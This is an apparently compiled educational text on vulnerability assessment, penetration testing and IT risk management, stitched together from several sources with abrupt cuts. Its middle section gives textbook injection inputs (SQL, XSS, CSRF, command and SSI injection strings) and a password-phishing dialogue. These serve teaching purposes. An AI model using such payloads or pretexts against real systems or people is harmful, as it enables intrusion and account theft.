Vulnerability is defined to be a combination of the attractiveness of a facility as a target and the level of deterrence and/or defense provided by the existing countermeasures. Target attractiveness is a measure of the asset or facility in the eyes of an aggressor and is influenced by the function and/or symbolic importance of the facility. Sample definitions for vulnerability ratings are as follows:
Very High: This is a high profile facility that provides a very attractive target for potential adversaries, and the level of deterrence and/or defense provided by the existing countermeasures is inadequate. High: This is a high profile regional facility or a moderate profile national facility that provides an attractive target and/or the level of deterrence and/or defense provided by the existing countermeasures is inadequate. Moderate: This is a moderate profile facility (not well known outside the local area or region) that provides a potential target and/or the level of deterrence and/or defense provided by the existing countermeasures is marginally adequate. Low: This is not a high profile facility and provides a possible target and/or the level of deterrence and/or defense provided by the existing countermeasures is adequate.
The vulnerability assessment may also include detailed analysis of the potential impact of loss from an explosive, chemical, or biological attack. Professionals with specific training and experience in these areas are required to perform these detailed analyses.
A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. Examples of systems for which vulnerability assessments are performed include, but are not limited to, information technology systems, energy supply systems, water supply systems, transportation systems, and communication systems. Such assessments may be conducted on behalf of a range of different organizations, from small businesses up to large regional infrastructures. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields. Vulnerability assessment has many things in common with risk assessment. Assessments are typically performed according to the following steps: 1. 2. 3. 4. Cataloging assets and capabilities (resources) in a system. Assigning quantifiable value (or at least rank order) and importance to those resources Identifying the vulnerabilities or potential threats to each resource Mitigating or eliminating the most serious vulnerabilities for the most valuable resources A vulnerability assessment is the process of running automated tools against defined IP addresses or IP ranges to identify known vulnerabilities in the environment. Vulnerabilities typically include unpatched or mis-configured systems. The tools may be commercially available versions, such as Nessus or Saint or open source free tools such as OpenVAS. The commercial versions typically include a subscription to maintain up to date vulnerability signatures similar to antivirus software subscriptions. The commercially available tools provide a straight forward method to performing vulnerability scanning. Organizations may also choose to use open source versions of vulnerability scanning tools. The advantage of open source tools is that you are using the tools
of the trade commonly used by hackers. Most hackers are not going to pay $2,000 for a subscription to Nessus but will opt for the free version of tools. However, by using a commercially licensed vulnerability scanner the risk is low that malicious code is included in the tool. The purpose of a vulnerability scan is to identify known vulnerabilities so they can be remediated, typically through the application of vendor supplied patches. Vulnerability scans are key to organizations vulnerability management program. The scans are typically run at least quarterly. Vulnerabilities are remediated by the IT department until the next scan is run and the new list of vulnerabilities is identified that needs to be addressed. A vulnerability assessment is an automated scan to determine basic flaws in a system. This can be either network or application vulnerability scanning, or a combination of both. The common factor here is that the scan is automated and generates a report of vulnerabilities or issues that may need to be addressed. In a network vulnerability scan, software looks at a set list of IP addresses to determine what services are listening across the network, and also what software (including versions of the software) are running. Limited tests are run against the listening services, including attempts to login with default account credentials, or comparing the versions of software against known vulnerable versions. If a match is found, it is recommended that the listening port be closed off and/or the software be upgraded if possible. Application vulnerability scanning can take either or both of two approaches:
Static Code Analysis: If you own the codebase of your application, the best place to start is by secure coding practices. It is a good idea to have code review as part of your software development process. Static Code Analysis involves more work upfront but results in much more robust applications. Dynamic Code Analysis is the next step, and its done by taking a black box approach to the app, and trying to probe it with tools similar to scanners that will perform injections and try to crash or bypass controls in the application. This is an automated process, and there are some inexpensive or free tools from Cenzic, Whitehat and Veracode, among others, that can do this on a basic level and offer different versions of this type of scan.
Identifying Vulnerabilities
A vulnerability assessment uses a combination of various methodologies to identify vulnerabilities including:
1.Patch correlation - identifying the flaw by looking to see if the patch for the flaw is missing 2. Version correlation - identifying the flaw by looking at the software version in question 3. Configuration correlation - identifying the flaw based on system configurations 4. Policy correlation - identifying the flaw based on policy, procedure, and specification analysis 5. Inferred correlation - identifying the flaw based on presence of software, services, other flaws, etc. 6. Response correlation - identifying the flaw based on results of an exploit attempt 7. Social correlation - identifying the flaw based on social situations
Misconception #1 - A vulnerability assessment just finds vulnerabilities. It does not exploit them. The methodology used for the activity does not determine whether the activity is a vulnerability assessment or a penetration test. However, the methodology used for vulnerability identification may affect correctness and completeness of identification, which will in turn affect the overall outcome of the assessment. Each of the methods is useful to varying degrees in different scenarios. No one method is clearly better than another method in all cases. Regardless of how we enumerate the vulnerabilities, we now have them. Notice that in some cases, we actually exploited the vulnerabilities to directly or indirectly identify the presence of the vulnerability. Performing the exploitation did not move us out of the realm of a vulnerability assessment (misconception point #1). We could potentially run every single exploit for every vulnerability as our means of vulnerability identification, if we had exploits for every vulnerability that we wanted to identify. However, realizing that an attempt to exploit a vulnerability may cause disruption to computer networks, may not actually confirm the vulnerability, or even worse, may cause the assessed system to crash, we often substitute such exploitation in favor of other methods such as patch validation. The results are most often more accurate and less disruptive than exploitive vulnerability identification. Vulnerability Valuation Vulnerabilities are ranked and classified based on a variety of factors including: 1. Severity Confidentiality, Integrity and Availability values for a flaw if it is exploited 2. Exploitability - How easy is it to exploit the flaw 3. Relevance - How new or old is the flaw 4. Organizational risk How valuable is the resource bearing the vulnerability to the company These factors allow us to properly assess our target and provide a valuation that makes sense given all of the defined factors. Finally, as part of the assessment, it is typically assumed that you provide mitigation strategies to improve the security of the resource. Strictly speaking, this is not part of the assessment process. It is generally assumed that when you are given an assessment, you will be provided information regarding improving your valuation but that is an additional service to an assessment. Some vulnerability assessment vendors will provide very little information, some provide fully managed remediation, and many fall in between.
All of these are goals for a penetration test. The organization asserts that they have sufficiently protected themselves to the degree that the assertions should prove to be true. PCI Data Security Standard requirement 11.3 requires that an organization that stores credit card holder data engage in a penetration test to validate that this information is secure3. In essence, PCI requires that the organization assert that they are secure in this regard and requires that the organization test this assertion. With this defined, I raise the following misconception regarding penetration testing as it relates to vulnerability assessments: Misconception #2 - A penetration test is testing to see if vulnerabilities are actually present In a penetration test the "something" that we are testing is not the validity of the found vulnerabilities. If we wanted more accurate vulnerability identification, we would ensure that we used more accurate means to identify vulnerabilities. We would not use a penetration test to validate them. Once again, penetration testing assesses the organization's assertion that they are secure. Another misconception regarding penetration testing is: Misconception #3 - Penetration tests only involve network hacking tools. A penetration test, as seen above, is simply a test that examines an assertion by the organization for a given goal. It may involve the use of social engineering tactics, physical security hacking tactics, Google hacking, and of course, the use of network hacking tools.
As depicted above, an organization bearing security risk should engage in an ongoing vulnerability management program. Although not shown in the above diagram, the program should consist of ongoing measurements that determine the risk level. The organization should only engage in a penetration test when they have done what they can to lower the risk to the desired level. At some point in time, the organization should assert that they are confident that they have secured what is important and only then should they engage in a penetration test. Vulnerability Detection After having gathered the relevant information about the targeted system, the next step is to determine the vulnerability that exists in each system. Penetration testers should have a collection of exploits and vulnerabilities at their disposal for this purpose. The knowledge of the penetration tester in this case would be put to test. An analysis will be done on the information obtained to determine any possible vulnerability that might exist. This is called manual vulnerability scanning as the detection of vulnerabilities is done manually. There is an exploit known as the dot bug that existed in MS Personal Web Server back in 1998. This is a bug that existed in IIS 3.0 that allowed ASP source code to be downloaded by appending a . to the filename. Microsoft eventually fixed this bug but they did not fix the same hole in their Personal Web Server at that time. Some Personal Web Servers has this vulnerability until today. If a system running Windows 95 and MS Personal Web Server pops up in the information gathered earlier, this would probably be a vulnerability that might exist in that particular system. There are tools available that can automate vulnerability detection. Such a tool is Nessus (http://www.nessus.org). Nessus is a security scanner that audit remotely a given network and determine whether vulnerabilities exists in it. It produces a list of vulnerabilities that exist in a network as well as steps that should be taken to address these vulnerabilities.
SQL injection
SQL injection can occur when invalidated user input is used to construct an SQL query that is then executed by the web server. A very well known example is a query used by a user login. This query is usually like "SELECT * FROM users WHERE username='entered username' AND password='entered password' ". If an attacker enters the string x' OR '1'='1 in both the username and the password then query becomes "SELECT * FROM users WHERE username='x' OR '1'='1' AND password='x' OR '1'='1' ". Because '1' is always equal to '1', this query is true for all records in the database. There are two different types of SQL injection: blind SQL injection and "normal" SQL injection. The difference between these two types is that for "normal" SQL injection the server shows an error message when the SQL queries syntax in incorrect, for blind SQL injection this error message is not shown. Instead the attacker will see a generic error message or page. "Normal" SQL injection can be tested for by entering characters like quotes to create a query with an incorrect syntax and search the page for error messages about it. Blind SQL injection cannot be detected this way, instead the attacker has to enter SQL commands like sleep or statements that are always true or false. For instance trying both strings ' AND '1'='1 and ' AND '1'='2 will likely produce different results if the page is vulnerable to SQL injection.
XPath injection
XPath injection (aka Blind XPath Injection)) is similar to SQL injection. The difference between these two vulnerabilities is that SQL injection takes place in a SQL database, whereas XPath injection takes place in an XML file as XPath is a query language for XML data. Just like SQL injection the attack is based on sending malformed information to the web application. This way the attacker can discover how the XML data is structured or access data he is not allowed to.
Just like SQL injection, there are two types of XPath injection: "normal" XPath injection and blind XPath injection. The difference between these two types of XPath injection is that for blind XPath injection the attacker has no knowledge about the structure of the XML document and the application does not provide useful error messages. Testing for XPath injection is also similar to SQL injection. The first step would be to insert a quote in an input _eld to see if it produces an error message. For blind XPath injection data is injected to create a query that always produces true or false.
XSS
Cross-site scripting, often abbreviated as XSS. In short, it occurs when an attacker can input HTML code (such as Javascript), that will then be executed for the visitors of the site. An example would be a guest book that shows the text that is entered in the guest book on the website. If an attacker enters the string <script>alert('XSS');</script> a pop-up with the text "XSS" would be shown on that page of the guest book. This type of vulnerability can also be exploited in a more serious way. An attackers might use XSS to steal a user's cookie, which can then be used to impersonate the user on a website There are three diffrent types of XSS: stored XSS, reflected XSS and DOM based XSS. The diffrences between these types are that, for stored XSS the attacker's code is stored on the web server , whereas for reflected XSS the attacker's code is added to a link to the web application (e.g. in a GET parameter) and the attacker has to trick a user into clicking on the link. Such a link would look like http://www.example.com/index.php?input=<script>alert('XSS');</script>. For Dom based XSS the attacker's code is not injected in the web application, instead the attacker uses existing Javascript code on the target page to write text (e.g. <script>alert('XSS');</script> on the page. To test for this vulnerability, a penetration testing tool should try to input HTML code in the inputs on a web application.
CSRF
Cross-Site Request Forgery, often abbreviated as CSRF, is an attack where an attacker tricks a user's browser into loading a request that performs an action on a web application that user is currently authenticated to. For example an attacker might post the following HTML on a website or send it in an HTML email <img src="http://www.bank.com/transfer_money?amount=10000&target_account=12345"> . If the user is authenticated at his bank website (at http://www.bank.com) when this link is loaded it would transfer 10000 from the user's account to bank account number 12345 Testing for this attack is pretty similar to testing for XSS, the tool will have to check if it can inject a link that may have effect on another web application (e.g. the link of the example) into the web application that is being tested.
Command injection
Command injection means that the attacker can execute a command on the server. An example would be a web application that lets the user enter an IP address that the server will then send a ping to. If an attacker would enter the string 1.2.3.4;ls the server would send a ping to the IP address 1.2.3.4 and run the command "ls". This vulnerability can be tested by a penetration testing tool by entering a semicolon followed by a command (e.g. "ls") into an input field that may be vulnerable and checking if the response of the web application contains the output of the injected command.
SSI injection
Server-Side Includes Injection ,often abbreviated to SSI injection is an attack where the attacker can enter SSI directives (e.g. <!#includefille="file.txt" _> or <!#exec cmd="ls -l" _>) that are then executed by the web server. To test for SSI injection a penetration testing tool would have to enter SSI directives in the inputs on a web application and see if the web server executes these by searching the web page for results of the SSI directive.
Buffer overfow
In short, a buffer overflow occurs when an application tries to store more data in a buffer than the buffer can hold. Testing for buffer overflows is relatively easy. The tool will have to input long (random) data and see if it produces any errors caused by trying to store more data than fits in the buffer.
Penetration Attempt
After determining the vulnerabilities that exist in the systems, the next stage is to identify suitable targets for a penetration attempt. The time and effort that need to put in for the systems that have vulnerabilities need to be estimated accordingly. Estimations on how long a penetration test takes on a particular system are important at this point. The target chosen to perform the penetration attempt is also important. Imagine a scenario whereby two penetration testers are required to perform a penetration test on a network consisting of more than 200 machines. After gathering sufficient information and vulnerabilities about the network, they found out that there are only 5 servers on the network and the rest are just normal PCs used by the organizations staff. Common sense will tell these them that the likely target would be these 5 servers. One practice that most organizations do is to name their machines in a way that they understand what the machine does. The computer name of the target is sometimes a decisive factor for choosing targets. Often after a network survey you would find computer names like SourceCode_PC, Int_Surfing and others that give penetration testers an idea of what the machine does. By choosing their target properly, penetration testers will not waste time and effort doing any redundant job. Normally penetration tests have a certain time constraint and penetration testers should not waste any time unnecessarily. There are other ways to choose a target. The above just demonstrates some criteria used. After choosing the suitable targets, the penetration attempt will be performed on these chosen targets. There are some tools available for free via the Internet but they generally require customization. Knowing that a vulnerability exist on a target does not always imply that it can be exploited easily. Therefore it is not always possible to successfully penetrate even though it is theoretically possible. In any case exploits that exist should be tested on the target first before conducting any other penetration attempt. Password cracking has become a normal practice in penetration tests. In most cases, youll find services that are running on systems like telnet and ftp. This is a good place to start and use our password cracking methods to penetrate these systems. The list below shows just some of the password cracking methods used: Dictionary Attack Uses a word list or dictionary file. Hybrid Crack - Tests for passwords that are variations of the words in a dictionary file. Brute Force - Tests for passwords that are made up of characters going through all the combinations possible. Theres a very good tool that can be used to automate telnet and ftp account cracking. This tool is called Brutus. The penetration attempts do not end here. There are two more suitable methods to attempt a penetration. This is through social engineering and testing the organizations physical security. Social engineering is an art used by hackers that capitalizes on the weakness of the human element of the organizations defense. The dialog below shows an example how an attacker can exploit the weakness of an employee in a large organization. Attacker: Hi Ms Lee, this is Steven from the IS Department. Ive found a virus stuck in your mail box and would like to help you remove it. Can I have the password
to your email ? Ms Lee (the secretary): A virus ? Thats terrible. My password is magnum. Please help me clean it up Theres no harm in deploying social engineering and using it numerous times to obtain critical information from the organizations employees. This of course is bound to the agreement that the organization allows such methods to be used during the penetration tests. Physical security testing involves a situation of penetration testers trying to gain access to the organizations facility by defeating their physical security. Social engineering can be used to get pass the organizations physical security as well. The main focus of this paper is penetration testing but there is often some confusion between penetration testing and vulnerability assessment. The two terms are related but penetration testing has more of anemphasis on gaining as much access as possible while vulnerability testing places the emphasis on identifying areas that are vulnerable to a computer attack. An automated vulnerability scanner will often identify possible vulnerabilities based on service banners or other network responses that are not in fact what they seem. A vulnerability assessor will stop just before compromising a system, whereas a penetration tester will go as far as they can within the scope of the contract. It is important to keep in mind that you are dealing with a Test. A penetration test is like any other test in the sense that it is a sampling of all possible systems and configurations. Unless the contractor is hired to test only a single system, they will be unable to identify and penetrate all possible systems using all possible vulnerabilities. As such, any Penetration Test is a sampling of the environment. Furthermore, most testers will go after the easiest targets first.
VULNERABILITY IDENTIFICATION
The analysis of the threat to an IT system must include an analysis of the vulnerabilities associated with the system environment. The goal of this step is to develop a list of system vulnerabilities (flaws or weaknesses) that could be exploited by the potential threat-sources.
internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the systems security policy. Vulnerability Terminated employees system identifiers (ID) are not removed from the system Company firewall allows inbound telnet, and guest ID is enabled on XYZ server The vendor has identified flaws in the security design of the system; however, new patches have not been applied to the system Data center uses water sprinklers to suppress fire; tarpaulins to protect hardware and equipment from water damage are not in place Threat-Source Terminated employees Threat Action Dialing into the companys network and accessing company proprietary data Using telnet to XYZ server and browsing system files with the guest ID Obtaining unauthorized access to sensitive system files based on known system vulnerabilities Water sprinklers being turned on in the data center
Unauthorized users (e.g., hackers, terminated employees, computer criminals, terrorists) Unauthorized users (e.g., hackers, disgruntled employees, computer criminals, terrorists) Fire, negligent persons
Recommended methods for identifying system vulnerabilities are the use of vulnerability sources, the performance of system security testing, and the development of a security requirements checklist. It should be noted that the types of vulnerabilities that will exist, and the methodology needed to determine whether the vulnerabilities are present, will usually vary depending on the nature of the IT system and the phase it is in, in the SDLC: If the IT system has not yet been designed, the search for vulnerabilities should focus on the organizations security policies, planned security procedures, and system requirement definitions, and the vendors or developers security product analyses (e.g., white papers). If the IT system is being implemented, the identification of vulnerabilities should be expanded to include more specific information, such as the planned security features described in the security design documentation and the results of system certification test and evaluation. If the IT system is operational, the process of identifying vulnerabilities should include an analysis of the IT system security features and the security controls, technical and procedural, used to protect the system.
While the scope of the fundamental security flaws in some applications often requires a re-architecture, there are several secondary measures infosec teams can implement to safeguard flawed applications. This tip covers a few of the steps that information security professionals can take to lock down their Web apps.
Using VPNs
For starters, as a best practice, certain functionality should only be accessible via a VPN. All admin functionality, for instance, should be remapped onto internal IPs, which can then only be accessed by certain IPs over a VPN. Example functions include content management systems (CMS), server status scripts (server-status), and info scripts or SQL admin programs. Recently, HBGary Federal was attacked partly because the company allowed its CMS to be exposed to public IPs accessible from the Internet. It is also prudent to restrict Web services access only to internal IPs, unless you intend to give other companies access to them, in which case, those companies should also be provided with credentials for service access.
Giving unnecessary rights to users is another area of concern, whether they be rights to a SQL server database or the service account that the application or Web server runs on. This allows SQL tables to be dropped, commands run on SQL servers or the Web server to run a wide range of programs, some of which might have privilege escalation vulnerabilities. While performing a recent pen test, I obtained a shell within an application server. Even though I was unable to escalate my privileges, the account had the ability to download and compile programs like port-scanners, which allowed me to demonstrate that the machine could be used to stage further attacks into the network. Thus, making sure that users -- and programs that run as users -- have the minimum amount of rights necessary to do their jobs, and no more, is of utmost importance.
method is used to retrieve the information that is requested. The GET method is one of the most common ways to retrieve web resources. The HEAD method is similar to the GET method, but is used to retrieve only header information. The POST method is used to send a request with the entity enclosed in a body; the response to this request is determined by the server. The PUT method is used to store the enclosed entity on a server, while the DELETE method is used to remove the resources from the server. The TRACE method is employed to return the request that was received by the final recipient from the client so that it can diagnose the communication. Finally, the CONNECT method creates a tunnel with a proxy .There are also extended HTTP methods such as web-based distribution authoring and versioning (WEBDAV). WEBDAV can be used by clients to publish web contents and involves a number of other HTTP methods such as PROPFIND, MOVE, COPY, LOCK, UNLOCK, and MKCOL (Goland, Whitehead, Faizi, Carter, & Jensen, 1999). HTTP methods can be used to help developers in the deployment and testing of web applications. On the other hand, when they are configured improperly, these methods can be used for malicious activity .
a firewall. Since the purpose of this paper is to demonstrate the usage of dangerous HTTP methods, some general steps such as using NMAP scanning are not described extensively.
Network diagram
Reconnaissance
This penetration test is a black box test; the penetration tester does not have any knowledge about the target systems. At this point, the penetration tester only knows the company name and IP address ranges, which are subnet 10.10.10.0/24 and subnet 192.168.10.0/24. First, the penetration tester runs an NMAP scan against these two networks and finds the following information-10.10.1: Network device with no ports open; 192.168.10.10: Windows XP running Tomcat 5.0/JBOSS 4.0 with TCP port 80 open. Since port 80 is listening on host 192.168.10.10, the penetration tester does a further check and finds out that HTTP methods are enabled on the host. There are several ways to check the enabled methods; the easiest way is by using a telnet command, as shown in below Figure . The result shows that the host accepts many dangerous HTTP methods such as PUT and DELETE.
telnet 192.168.10.10 80 OPTIONS / HTTP/1.1 Host: 19*2.168.10.10 HTTP/ 1.1 200 OK X-Powered-By: Servlet 2.4: Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS Content-Length:0 Date- Tue, 03 Jan 2012 20:07:11 GMT Server: Apache-Coyete/1.1
The Nmap scripting engine is a powerful tool for user-created scripts. This power is demonstrated in the suite of scripts designed to inspect Windows over the SMB protocol. Many footprinting tasks can be performed, including finding user accounts, open shares, and weak passwords. All these tasks are under a common framework, and share authentication libraries, which gives users a common and familiar interface. With modern script libraries, which were written by the author, the Nmap Scripting Engine (NSE) has the ability to establish a null or authenticated session with all modern versions of Windows. By leveraging these sessions, scripts have the ability to probe and explore Windows systems in great depth, providing an attacker with invaluable information about the server. Nmap, a network scanner, is among the best known security tools, and is considered to be one of the best free security tools in existence (Darknet, 2006). The typical use and functionality of Nmap is beyond the scope of this paper, but familiarity will make this paper far easier to be understood. The book Nmap Network Scanning, which is partially available for free, is one of the best information sources (Lyon, 2009). The Nmap Scripting Engine, or NSE, is an extension to Nmap developed with several purposes in mind, including advanced network discovery, sophisticated version detection, vulnerability detection, backdoor detection, and vulnerability exploitation (Lyon, 2009). After Nmap scans a group of hosts, NSE runs scripts against each host that matches specific criteria (for example, the host has the appropriate ports open). These scripts, which are written in the Lua programming language, can inspect the host in a much deeper and more sophisticated way than Nmap alone. Since Lua is a complete programming language, the possibilities for scripts are great. In addition to the power of scripts, another important aspect is the development culture. Since scripts can be written by anyone, and Lua is a relatively simple language
for programmers to learn, it is not difficult for a programmer to begin developing his or her own script. Due to the fairly small team of core developers, and an active mailing list, getting started in script development is easy.
SMB_COM_NEGOTIATE
The SMB_COM_NEGOTIATE packet is the first one sent by the client, and is the client's opportunity to indicate which protocols, flags, and options it understands. The
server responds with its preferred protocol, options, and flags, based on the clients list. The options and flags reveal certain configuration options to the client, such as whether or not message signatures are supported or required, whether or not the server requires plaintext passwords, and whether share-level or user-level authentication is understood. These options are probed by the script smb-security-mode.nse. The following is an example output against a typical configuration of Windows:
Some of these options are revealing from a penetration tester's perspective. For example, this server does not support message signing; as a result, man-in-the-middle attacks are possible. However, since message signing is not a default option on Windows, this is not a surprising state. If share-level security or plaintext passwords were required, however, that would be an interesting find. Implementing CIFS has more information about the different levels of security supported by SMB In addition to the security information, the response to SMB_COM_NEGOTIATE also reveals the server's time and timezone, as well as the name of the server and its workgroup or domain membership. Revealing the time may be useful to a penetration tester because it is a sign of how well maintained a server is. The name and workgroup of the server can be helpful to a penetration tester when trying to determine the purpose of a server or a network, leading to more targeted attacks for a penetration tester. The script smb-os-discovery.nse probes for the servers name and time. The following output is from smb-os-discovery run against a poorly maintained Windows 2000 test server
From the name and time alone, it can be determined that the operating system is Windows 2000 ("RON-WIN2K-TEST"), that it is a test machine, and that the time is off by about an hour (the current time is 11:03, but the server returns 11:59). One may conclude that it is a test server running on an outdated operating system, and that it is poorly maintained or infrequently used. This information could be valuable to a penetration tester when choosing a target, since the chances that this server has unpatched vulnerabilities are high. On a large network, this can quickly give a sense of a network's composition and purpose.
SMB_COM_SESSION_SETUP_ANDX
The SMB_COM_SESSION_SETUP_ANDX packet is sent by the client immediately after the negotiate response is received. The packets primary purpose is authentication, and contains the clients username, domain, and password. Unless plaintext authentication was requested in the negotiate packet, the password is hashed with one of Microsoft's hashing algorithms (both Lanman and NT Lanman (NTLM) are used by default). Recovering the password from one these hashes is supposed to be difficult (although in practice it is usually straight forward). Instead of sending a username and password, the client may also establish a null (or anonymous) session by sending a blank username and a blank password. For the purposes of these scripts, four account types are defined. Anonymous accounts, commonly called a null session, offer little access to the system, except on Windows 2000. Guest accounts offer slightly more access, and can find some interesting information; the guest account typically has no password and is disabled by default on many Windows versions. Under certain configurations, such as Windows XPs default settings, all user accounts, including administrators, are treated as guests (Microsoft, 2005). User-level accounts are common, and are able to perform most checks. User-level accounts are defined as any account on a system that is not in the Administrators group. And finally, administrator-level accounts are accounts in the Administrators group. Administrative accounts can run every test against Windows 2003 and earlier, but are essentially the same as user-level accounts on Windows Vista and higher unless user account control (UAC) is disabled. The server's response to the SMB_COM_SESSION_SETUP_ANDX packet contains a true/false value indicating whether or not the username/password combination was accepted. If it was accepted, which is always the case when an anonymous (null) session is requested, the server also includes its operating system and LAN manager version in the reply. The smb-os-discovery.nse script will authenticate anonymously and display the operating system information. The following examples show the smb-os-discovery.nse script being run against Windows 2000 and Windows 2003:
For instance a Vulnerability Analysis exercise might identify absence of anti-virus software on the system or open ports as a vulnerability. The Penetration Testing will determine the level to which existing vulnerabilities can be exploited and the damage that can be inflicted due to this. 11. A Vulnerability Analysis answers the question: What are the present Vulnerabilities and how do we fix them? A Penetration Testing simply answers the questions: Can any External Attacker or Internal Intruder break-in and what can they attain? 12. A Vulnerability Analysis works to improve security posture and develop a more mature, integrated security program, where as a Penetration Testing is only a snapshot of your security programs effectiveness. Commonly Vulnerability Assessment goes through the following phases: Information Gathering, Port Scanning, Enumeration, Threat Profiling & Risk Identification, Network Level Vulnerability Scanning, Application Level Vulnerability Scanning, Mitigation Strategies Creation, Report Generation, and Support. Where as a Penetration Testing Service however have following phases: Information Gathering, Port Scanning, Enumeration, Social Engineering, Threat Profiling & Risk Identification, Network Level Vulnerability Assessment, Application Level Vulnerability Assessment, Exploit Research & Development, Exploitation, Privilege Escalation, Engagement Analysis, Mitigation Strategies, Report Generation, and Support.
RISK ANALYSIS
Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations to better manage IT-related mission risks. In addition, this section provides information on the selection of cost-effective security controls.2 These controls can be used to mitigate risk for the better protection of mission-critical information and the IT systems that process, store, and carry this information. Organizations may choose to expand or abbreviate the comprehensive processes and steps suggested in this guide and tailor them to their environment in managing IT-related mission risks.
budget. Federal Chief Information Officers, who ensure the implementation of risk management for agency IT systems and the security provided for these IT systems The Designated Approving Authority (DAA), who is responsible for the final decision on whether to allow operation of an IT system The IT security program manager, who implements the security program Information system security officers (ISSO), who are responsible for IT security IT system owners of system software and/or hardware used to support IT functions. Information owners of data stored, processed, and transmitted by the IT systems Business or functional managers, who are responsible for the IT procurement process Technical support personnel (e.g., network, system, application, and database administrators; computer specialists; data security analysts), who manage and administer security for the IT systems IT system and application programmers, who develop and maintain code that could affect system and data integrity IT quality assurance personnel, who test and ensure the integrity of the IT systems and data Information system auditors, who audit IT systems IT consultants, who support clients in risk management.
to a service provider to have these systems monitored for the better protection of their property. Presumably, the homeowners have weighed the cost of system installation and monitoring against the value of their household goods and their familys safety, a fundamental mission need. The head of an organizational unit must ensure that the organization has the capabilities needed to accomplish its mission. These mission owners must determine the security capabilities that their IT systems must have to provide the desired level of mission support in the face of realworld threats. Most organizations have tight budgets for IT security; therefore, IT security spending must be reviewed as thoroughly as other management decisions. A well-structured risk management methodology, when used effectively, can help management identify appropriate controls for providing the mission-essential security capabilities.
Phase 1Initiation
The need for an IT system is expressed and the purpose and scope of the IT system is documented
Phase 3Implementation
The system security features should be configured, enabled, tested, and verified
The system performs its functions. Typically the system is being modified on an ongoing basis through the addition of hardware and software and by changes to organizational processes, policies, and procedures This phase may involve the disposition of information, hardware, and software. Activities may include moving, archiving, discarding, or destroying information and sanitizing the hardware and
Phase 5Disposal
Risk management activities are performed for system components that will be disposed of or replaced to ensure that the hardware and software are properly disposed of, that residual data is
software
appropriately handled, and that system migration is conducted in a secure and systematic manner
RISK ASSESSMENT
Risk assessment is the first process in the risk management methodology. Organizations use risk assessment to determine the extent of the potential threat and the risk associated with an IT system throughout its SDLC. The output of this process helps to identify appropriate controls for reducing or eliminating risk during the risk mitigation process, as discussed in Section 4. Risk is a function of the likelihood of a given threat-sources exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organization. To determine the likelihood of a future adverse event, threats to an IT system must be analyzed in conjunction with the potential vulnerabilities and the controls in place for the IT system. Impact refers to the magnitude of harm that could be caused by a threats exercise of a vulnerability. The level of impact is governed by the potential mission impacts and in turn produces a relative value for the IT assets and resources affected (e.g., the criticality and sensitivity of the IT system components and data). The risk assessment methodology encompasses nine primary steps 1. 2. 3. 4. 5. 6. 7. 8. 9. System Characterization Threat Identification Vulnerability Identification Control Analysis Likelihood Determination Impact Analysis Risk Determination Control Recommendations Results Documentation
IMPACT ANALYSIS
The next major step in measuring level of risk is to determine the adverse impact resulting from a successful threat exercise of a vulnerability. Before beginning the impact analysis, it is necessary to obtain the following necessary System mission (e.g., the processes performed by the IT system) System and data criticality (e.g., the systems value or importance to an organization) System and data sensitivity. This information can be obtained from existing organizational documentation, such as the mission impact analysis report or asset criticality assessment report. A mission impact analysis (also known as business impact analysis [BIA] for some organizations) prioritizes the impact levels associated with the compromise of an organizations information assets based on a qualitative or quantitative assessment of the sensitivity and criticality of those assets. An asset criticality assessment identifies and prioritizes the sensitive and critical organization information assets (e.g., hardware, software, systems, services, and related technology assets) that support the organizations critical missions. If this documentation does not exist or such assessments for the organizations IT assets have not been performed, the system and data sensitivity can be determined based on the level of protection required to maintain the system and datas availability, integrity, and confidentiality.
Regardless of the method used to determine how sensitive an IT system and its data are, the system and information owners are the ones responsible for determining the impact level for their own system and information. Consequently, in analyzing impact, the appropriate approach is to interview the system and information owner(s). Therefore, the adverse impact of a security event can be described in terms of loss or degradation of any, or a combination of any, of the following three security goals: integrity, availability, and confidentiality. The following list provides a brief description of each security goal and the consequence (or impact) of its not being met: Loss of Integrity. System and data integrity refers to the requirement that information be protected from improper modification. Integrity is lost if unauthorized changes are made to the data or IT system by either intentional or accidental acts. If the loss of system or data integrity is not corrected, continued use of the contaminated system or corrupted data could result in inaccuracy, fraud, or erroneous decisions. Also, violation of integrity may be the first step in a successful attack against system availability or confidentiality. For all these reasons, loss of integrity reduces the assurance of an IT system. Loss of Availability. If a mission-critical IT system is unavailable to its end users, the organizations mission may be affected. Loss of system functionality and operational effectiveness, for example, may result in loss of productive time, thus impeding the end users performance of their functions in supporting the organizations mission. Loss of Confidentiality. System and data confidentiality refers to the protection of information from unauthorized disclosure. The impact of unauthorized disclosure of confidential information can range from the jeopardizing of national security to the disclosure of Privacy Act data. Unauthorized, unanticipated, or unintentional disclosure could result in loss of public confidence, embarrassment, or legal action against the organization. Some tangible impacts can be measured quantitatively in lost revenue, the cost of repairing the system, or the level of effort required to correct problems caused by a successful threat action. Other impacts (e.g., loss of public confidence, loss of credibility, damage to an organizations interest) cannot be measured in specific units but can be qualified or described in terms of high, medium, and low impacts. Because of the generic nature of this discussion, this guide designates and describes only the qualitative categorieshigh, medium, and low impact
RISK DETERMINATION
The purpose of this step is to assess the level of risk to the IT system. The determination of risk for a particular threat/vulnerability pair can be expressed as a function of The likelihood of a given threat-sources attempting to exercise a given vulnerability The magnitude of the impact should a threat-source successfully exercise the vulnerability The adequacy of planned or existing security controls for reducing or eliminating risk. To measure risk, a risk scale and a risk-level matrix must be developed.
Likelihood Determination
To derive an overall likelihood rating that indicates the probability that a potential vulnerability may be exercised within the construct of the associated threat environment, the following governing factors must be considered: Threat-source motivation and capability Nature of the vulnerability Existence and effectiveness of current controls. The likelihood that a potential vulnerability could be exercised by a given threat-source can be described as high, medium, or low.
Likelihood Definitions
Risk-Level Matrix
The final determination of mission risk is derived by multiplying the ratings assigned for threat likelihood (e.g., probability) and threat impact. Table below shows how the overall risk
